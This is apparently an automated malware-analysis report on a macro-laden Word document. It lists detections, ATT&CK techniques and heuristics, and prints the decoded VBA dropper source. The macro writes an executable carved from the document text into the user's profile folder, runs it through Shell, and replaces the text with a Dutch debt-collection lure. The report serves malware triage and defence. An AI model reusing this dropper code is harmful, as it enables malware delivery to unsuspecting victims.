MALICIOUS
336
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
This Office document contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The document body presents a lure to enable content, indicating an attempt to bypass security measures. The presence of MSScriptControl and GetObject calls, along with a critical heuristic for potential Shell calls in VBA, strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection as 'Doc.Downloader.Generic' further supports this assessment.
Heuristics 14
-
MSScriptControl.ScriptControl — CVE-2015-0097 high CVE likely CVE_2015_0097_SCMSScriptControl.ScriptControl — CVE-2015-0097
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
PggurDIUwaqOQd = Shell(tLLAYFDjBgTnlV) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set qLNbvsDU = GetObject(, "word.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
kQUZGgYO = Environ("USERPROFILE") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://office365.com In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4938 bytes |
SHA-256: 6c60472093a5ed190dd8c22e3600a913aec56bed3b6ecf6330c5cf23230a71cf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A3890737-1CCB-4F4B-83EE-967EF65EACEA}{8D02D022-E6D3-4AA1-86D7-D64C5D0F426D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
TYPwacNQZcDS
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub WzvQOl()
Dim VpOlOxJjQ As String
Dim iTdCdt As String
Dim tgGicCTPBiN As String
Dim EgtLLHjztiKnm As String
Dim PXfzakWmCoQUri As Integer
tgGicCTPBiN = "."
EgtLLHjztiKnm = "exe"
iTdCdt = "mQJeAtlU"
VpOlOxJjQ = iTdCdt + tgGicCTPBiN + EgtLLHjztiKnm
PXfzakWmCoQUri = FreeFile()
Open VpOlOxJjQ For Binary As PXfzakWmCoQUri
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub FUXDzGZU()
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Dim wEIdJlqMlg As Word.Document
Set wEIdJlqMlg = ThisDocument
wEIdJlqMlg.Range.InsertParagraphAfter
wEIdJlqMlg.Range.InsertAfter "Dossiers in Schuldbewaking " + vbLf
wEIdJlqMlg.Range.InsertAfter "" + vbLf
wEIdJlqMlg.Range.InsertAfter "Dossier 51123944" + vbLf
wEIdJlqMlg.Range.InsertAfter "Originele hoofdsom: 575,82 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Betaald: 0,00 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Openstaande hoofdsom: 575,82 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Rente (berekend tot 28052014): 326,73 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Kosten: 162,46 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Te betalen (totale balans) 1 065,01 EUR" + vbLf
wEIdJlqMlg.Range.InsertAfter "Lijst transacties Facturen" + vbLf
End Sub
Sub mksPuOUzPMTOHI(IeVrlfwKyQE)
DoEvents
End Sub
Sub xmckXnEjXw(tLLAYFDjBgTnlV As String)
Dim kQUZGgYO As String
Dim PggurDIUwaqOQd As Integer
kQUZGgYO = Environ("USERPROFILE")
ChDrive (kQUZGgYO)
ChDir (kQUZGgYO)
Debug.Print ("After OnTime: " & Now)
PggurDIUwaqOQd = Shell(tLLAYFDjBgTnlV)
FUXDzGZU
End Sub
Sub TYPwacNQZcDS()
Dim iTdCdt As String
Dim VpOlOxJjQ As String
Dim RLzlqp As Byte
Dim xEYGJINauzfnBcN As String
Dim EDohuWciVs As String
Dim NNiMbxJJ As Long
Dim kQUZGgYO As String
Dim XvHXxtzqbSkJMlS As Boolean
Dim EgtLLHjztiKnm As String
Dim UmsoYsz As Paragraph
Dim AmlwrRjeoc As Integer
Dim PggurDIUwaqOQd As Integer
Dim PXfzakWmCoQUri As Integer
EgtLLHjztiKnm = "exe"
EDohuWciVs = "zndYWHf"
tgGicCTPBiN = "."
iTdCdt = "mQJeAtlU"
VpOlOxJjQ = iTdCdt + tgGicCTPBiN + EgtLLHjztiKnm
kQUZGgYO = Environ("USERPROFILE")
ChDrive (kQUZGgYO)
ChDir (kQUZGgYO)
PXfzakWmCoQUri = FreeFile()
WzvQOl
Debug.Print ("After OnTime: " & Now)
Dim VsarVEJgZlU As String
Dim FUEMOGincXzf As String
Dim dJRzAtidsJv As String
Dim gJseKXAlbAcwnEd As String
Dim iyOvWzlmbRR As ScriptControl
Dim kmPyFwQOEHyOEWU As Document
Set iyOvWzlmbRR = UserForm1.ScriptControl1
iyOvWzlmbRR.Language = "VBS" + "cript"
dJRzAtidsJv = "ActiveDocument."
gJseKXAlbAcwnEd = "Paragraphs"
FUEMOGincXzf = dJRzAtidsJv + gJseKXAlbAcwnEd
Set qLNbvsDU = GetObject(, "word.Application")
On Error GoTo IufEQrycWsZ
iyOvWzlmbRR.AddObject "Obj", qLNbvsDU
IufEQrycWsZ:
For Each UmsoYsz In iyOvWzlmbRR.Eval("Obj." & FUEMOGincXzf)
mksPuOUzPMTOHI (UmsoYsz)
xEYGJINauzfnBcN = UmsoYsz.Range.Text
Debug.Print ("After OnTime: " & Now)
If (XvHXxtzqbSkJMlS = True) Then
NNiMbxJJ = 1
Dim JrwifWKWyg As Integer
JrwifWKWyg = 4
While (NNiMbxJJ < Len(xEYGJINauzfnBcN))
RLzlqp = Mid(xEYGJINauzfnBcN, NNiMbxJJ, JrwifWKWyg)
Debug.Print ("After OnTime: " & Now)
Put #PXfzakWmCoQUri, , RLzlqp
NNiMbxJJ = NNiMbxJJ + JrwifWKWyg
Wend
ElseIf (InStr(1, xEYGJINauzfnBcN, EDohuWciVs) > 0 And Len(xEYGJINauzfnBcN) > 0) Then
Dim IoJRbENKJeGC As Boolean
IoJRbENKJeGC = True
XvHXxtzqbSkJMlS = IoJRbENKJeGC
End If
Next
Close #PXfzakWmCoQUri
xmckXnEjXw (VpOlOxJjQ)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.